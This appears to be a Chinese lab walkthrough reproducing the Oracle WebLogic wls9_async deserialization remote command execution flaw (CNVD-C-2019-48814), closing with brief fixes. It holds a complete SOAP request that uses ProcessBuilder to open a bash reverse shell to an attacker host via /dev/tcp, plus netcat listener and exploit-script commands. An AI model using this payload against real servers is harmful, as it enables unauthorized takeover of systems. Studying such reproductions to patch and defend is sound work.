码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 漏洞复现 - - - WebLogic反序列化远程命令执行漏洞(二)


    目录

    一,漏洞信息

    二,实验环境

    三,漏洞利用

    第一步.查看其是否开启了wls9_async_response组件

    1.打开Centos

    2.开启weblogic

    3.访问weblogic

    4.查看async 

    5.访问AsyncResponseService 

     第二步,CNVD-C-2019-48814漏洞的具体利用

    方法一:bp

    1.监听

     2.开启代理

     3.使用bp抓包

     4.发送到repeater

     5.构造一个payload

    6.go发送

    7.查看终端监听 

     方法二:python脚本使用方法

    1.监听

     2.使用python脚本

    3.查看终端监听

     ​编辑

     四,解决办法


    一,漏洞信息

    漏洞编号:OracleWebLogic wls9-async反序列化远程命令执行漏洞(CNVD-C-2019-48814)

    影响版本:WebLogic 10.x    WebLogic 12.1.3 

    WebLogic Server是美国甲骨文(Oracle)公司开发的一款适用于云环境和传统环境的应用服务中间件,它提供了一个现代轻型开发平台,支持应用从开发到生产的整个生命周期管理,并简化了应用的部署和管理。存在于weblogic自带的wls9_async_response.war组件及wls-wsat组件中,在反序列化处理输入信息时存在缺陷,攻击者可以发送精心构造的恶意HTTP 请求,未授权的情况下远程执行命令。部分版本WebLogic中默认包含的wls9_async_response包,主要是为WebLogic Server提供异步通讯服务。

    反序列化:就是讲字节序列转化成对象的过程。

    二,实验环境

    服务器:Centos ,IP地址:10.1.1.100
    攻击机器:kali ,IP地址:10.1.1.200
    辅助工具:Firefox、burpsuite

    来源:合天网安实验室

    三,漏洞利用

    第一步.查看其是否开启了wls9_async_response组件

    1.打开Centos

    service iptables stop                                     //关闭防火墙

    2.开启weblogic

     cd /usr/local/weblogic/wlserver_10.3/samples/domains/wl_server/bin     //进入到这个目录

    nohup ./startWebLogic.sh                              //启动weblogic

     

    3.访问weblogic

    切换到kali机器,打开http://10.1.1.100:7001

    4.查看async 

    http://10.1.1.100:7001/_async, 打开发现403,目录存在

     

    5.访问AsyncResponseService 

    访问发送服务,查看是否开启了wls9_async_response组件

    http://10.1.1.100:7001/_async/AsyncResponseService

     

     第二步,CNVD-C-2019-48814漏洞的具体利用

    方法一:bp

    1.监听

    nc -lvvp 666

     2.开启代理

    如下图设置

     

     3.使用bp抓包

    抓取http://10.1.1.100:7001/_async/AsyncResponseService页面

     4.发送到repeater

     5.构造一个payload

    1. POST /_async/AsyncResponseService HTTP/1.1
    2. Host: 10.1.1.100:7001
    3. Content-Length: 789
    4. Accept-Encoding: gzip, deflate
    5. SOAPAction:
    6. Accept: */*
    7. User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
    8. Connection: keep-alive
    9. content-type: text/xml
    10. <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
    11. <soapenv:Header>
    12. <wsa:Action>xx</wsa:Action>
    13. <wsa:RelatesTo>xx</wsa:RelatesTo>
    14. <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
    15. <void class="java.lang.ProcessBuilder">
    16. <array class="java.lang.String" length="3">
    17. <void index="0">
    18. <string>/bin/bash</string>
    19. </void>
    20. <void index="1">
    21. <string>-c</string>
    22. </void>
    23. <void index="2">
    24. <string>bash -i &gt;&amp; /dev/tcp/10.1.1.200/666 0&gt;&amp;1</string>
    25. </void>
    26. </array>
    27. <void method="start"/></void>
    28. </work:WorkContext>
    29. </soapenv:Header>
    30. <soapenv:Body>
    31. <asy:onAsyncDelivery/>
    32. </soapenv:Body></soapenv:Envelope>

    6.go发送

    点击go 发现出现202,说明发送成功

    7.查看终端监听 

    成功反弹到了shell 

     方法二:python脚本使用方法

    1.监听

    nc -lvvp 666

     2.使用python脚本

    python async_reserve_shell.py http://10.1.1.100:7001/_async/AsyncResponseService 10.1.1.200 666                      

     

    3.查看终端监听

     

     四,解决办法

    找到并删除wls9_async_response.war、wls-wsat.war 然后重启Weblogic服务

    或者将/_async/* 及 /wls-wsat/*  的路径的URL访问注释静止

  • 相关阅读:
    和运维工程师聊完,发现小丑竟是我自己
    2022 年全国职业院校技能大赛高职组云计算赛项-容器云环境搭建
    开发知识点-Apache Axis2框架
    最全元宇宙概念分析!元宇宙为何发展于区块链?
    第一个Mybatis程序
    Elasticsearch 带中文分词的全文检索(分页+高亮返回)
    基于YOLOv5、YOLOv8的烟雾报警检测(超实用项目)
    Linux—软件管理
    TorchDrug教程--知识图推理
    操作系统知识点梳理-进程线程
  • 原文地址:https://blog.csdn.net/weixin_67503304/article/details/126500734
  • 最新文章
  • 【JVM】编译执行与解释执行的区别是什么?JVM 使用哪种方式?
    用 Hashids 优雅解决 C 端自增 ID 暴露问题
    V8引擎 精品漫游指南--Ignition篇(上) 指令 栈帧 槽位 调用约定 内存布局 基础内容
    LLVM Pass快速入门(四):代码插桩
    milkup:桌面端 markdown AI续写和即时渲染
    基于项目工程构建SBOM(软件物料清单)的研究
    鸿蒙应用开发UI基础第二节:鸿蒙应用程序框架核心解析与实操
    .NET 中如何快速实现 List 集合去重?
    扣子Coze实战:从0到1打造抖音+小红书热点监控智能体
    浅谈数据访问层
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号